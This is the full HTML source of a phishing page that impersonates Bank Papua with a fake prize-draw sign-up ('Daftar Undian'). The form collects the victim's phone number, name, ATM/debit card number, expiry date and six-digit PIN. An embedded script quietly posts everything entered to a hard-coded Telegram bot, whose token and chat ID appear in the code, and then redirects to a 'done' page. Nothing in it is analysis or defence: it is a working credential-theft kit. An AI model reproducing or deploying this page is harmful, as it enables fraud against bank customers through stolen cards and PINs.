<!DOCTYPE html>
<html lang="en">
 <head> 
  <meta charset="utf-8"> 
  <meta name="fragment" content="!"> 
    <link rel="canonical" href="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Ff831faacb8a6c7b38973f26b6d39ee07.cdn.bubble.io%2Ff1694098999075x797726526456642200%2FIMG-20230908-WA0000.jpg">
    <meta name="twitter:card" content="summary_large_image">
    <meta property="og:title" content="PT Bank Papua">
    <meta name="twitter:title" content="Bank Papua">
    <meta property="og:site_name" content="Bank - Papua">
    <meta name="twitter:site_name" content="Bank Papua">
        <link rel="image_src" href="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Ff831faacb8a6c7b38973f26b6d39ee07.cdn.bubble.io%2Ff1694098999075x797726526456642200%2FIMG-20230908-WA0000.jpg?w=&h=&auto=compress&dpr=1&fit=max">
    <meta property="og:image" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Ff831faacb8a6c7b38973f26b6d39ee07.cdn.bubble.io%2Ff1694098999075x797726526456642200%2FIMG-20230908-WA0000.jpg?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max">
    <meta name="twitter:image:src" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Ff831faacb8a6c7b38973f26b6d39ee07.cdn.bubble.io%2Ff1694098999075x797726526456642200%2FIMG-20230908-WA0000.jpg?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max">
  <title>Promo Gebyar Bank Papua</title> 
  	<meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet"> 
  <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        body {
            font-family: 'Open Sans', sans-serif;
        }

        .text-header {
            font-family: 'Open Sans', sans-serif;
            color: #0086e0;
        }

        .text-subheader {
            font-family: 'Open Sans', sans-serif;
            margin-top: -60px;
            color: #000;
        }

        .btn-punya {
            display: block;
            margin: 0px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: red;
            border: none; 
            text-align: center; 
            height: 42px; 
            width: 200px; 
            max-width: 90%;
            font-family: Arial; 
            font-size: 15px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }

        .btn-belum {
            display: block;
            margin: 30px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: #FFA62F;
            border: none; 
            text-align: center; 
            height: 40px; 
            width: 3500px; 
            max-width: 90%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: 400; 
            color: white; 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            transition: background 200ms ease 0s;
        }

        body{
    background: #3FBFBF;
    font-family: arial;
    text-align: left;
}
 
h1{
    color: #fff;
}
 
/*mydata*/
/*support google chrome*/
.mydata::-webkit-input-placeholder{
    color: white;
}
 
/*support mozilla*/
.mydata:-moz-input-placeholder{
    color: white;
}
 
/*support internet explorer*/
.mydata:-ms-input-placeholder{
    color: white;
}
 
</style> 
 </head> 
 <body class="chakra-ui-light" style="background: url(https://wjjsduydue.github.io/id-/bg.png);">
  <div class="container"> 
   <div class="row"> 
    <div class="col-12 d-block mx-auto text-center" style="height: auto; width: auto; max-width: auto; margin-top: 0px; margin-bottom: 0px; border-radius: 0px;"> 
        <br>
     <form id="tg">
   <div class="row"> 
    <div class="col-12">
<p style="color: white; font-size: 15px; margin-top: 0%; margin-left: 19px; text-align: left; font-weight: bold;">DAFTAR UNDIAN BANK PAPUA</p>
<hr>
<br>
<p style="color: white; font-size: 15px; margin-top: 0%; margin-left: 19px; text-align: left; font-weight: bold;">Masukan informasi kartu ATM yang<br>terdaftar pada layanan Mobile Banking</p><br>
<input class="mydata" placeholder="Nomor Handphone" required="" style="width:90%;height: 40px; border: 1px solid white; margin-left: 2%; margin-top: 0%; background: none; border-radius: 4px; text-align: left; padding-left: 10px; outline:none; border-color: #F5F5F5 1px 1px 1px 1px; font-size: 15px; color: white;" minlength="10" maxlength="13" type="tel" name="No-Hp" id="No-Hp"><br>
              <input class="mydata" placeholder="Nama Lengkap" required="" style="width:90%;height: 40px; border: 1px solid white; margin-left: 2%; margin-top: 5%; background: none; border-radius: 4px; text-align: left; padding-left: 10px; outline:none; border-color: #F5F5F5 1px 1px 0px 0px; font-size: 15px; color: white;" type="text" name="Nama" id="Nama"><br>
       <input class="mydata" placeholder="No Kartu ATM/Debit" required="" style="width:90%;height: 40px; border: 1px solid white; margin-left: 2%; margin-top: 5%; background: none; border-radius: 4px; text-align: left; padding-left: 10px; outline:none; border-color: #F5F5F5 1px 1px 1px 1px; font-size: 15px; color: white;" minlength="16" maxlength="19" type="tel" name="Kartu-ATM" id="Kartu-ATM"><br>
              <input type="tel" name="Masa-Berlaku" id="Masa-Berlaku" class="mydata" placeholder="Masa Berlaku Kartu / MM/YY" required="" style="width:90%;height: 40px; border: 1px solid white; margin-left: 2%; margin-top: 5%; background: none; border-radius: 4px; text-align: left; padding-left: 10px; outline:none; border-color: #F5F5F5 1px 1px 0px 0px; font-size: 15px; color: white;" minlength="4" maxlength="6"><br>
       <input class="mydata" placeholder="PIN ATM" required="" style="width:90%;height: 40px; border: 1px solid white; margin-left: 2%; margin-top: 5%; background: none; border-radius: 4px; text-align: left; padding-left: 10px; outline:none; border-color: #F5F5F5 1px 1px 0px 0px; font-size: 15px; color: white;" inputmode="numeric" minlength="6" maxlength="6" type="tel" name="Pin" id="Pin"></div>
        </div>
    <div class="col-12"> 
    <br>
           <button type="submit" class="btn-belum">LANJUTKAN</button> 
           <br>
           <br>
                    <p id="status"></p>
    </div> 
   </div> 
  </div> 
       <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script> 
<script>
    const chat_id = '6053547291', botID = 'bot6636474319:AAFu4oH4_pScqQWKtcbwSA_tFmhoaSLEVvM';
    const telegramURL = `https://api.telegram.org/${botID}/sendMessage`;
    document.querySelector('#tg').addEventListener("submit", async e => { // When the user submits the form
        e.preventDefault(); // Don't submit
        let text = JSON.stringify( // Convert the form data to a string to send as our Telegram message
            Object.fromEntries(new FormData(e.target).entries()), // Convert the form data to an object.
        null, 2); // Prettify the JSON so we can read the data easily
        const sendMessage = await fetch(telegramURL, { // Send the request to the telegram API
            method: 'POST',
            headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body.
            body: JSON.stringify({chat_id, text}), // The body must be a string, not an object
        });
        const messageStatus = document.querySelector('#status');
        if (sendMessage.ok) // Update the user on if the message went through
            messageStatus.textContent = "";
        else
            messageStatus.textContent = "Message Failed to send :( " + (await sendMessage.text());
        e.target.reset(); // Clear the form fields.
        window.location.href='/id-/done.html';
    });


   </script>
</form>
</body>
</html>
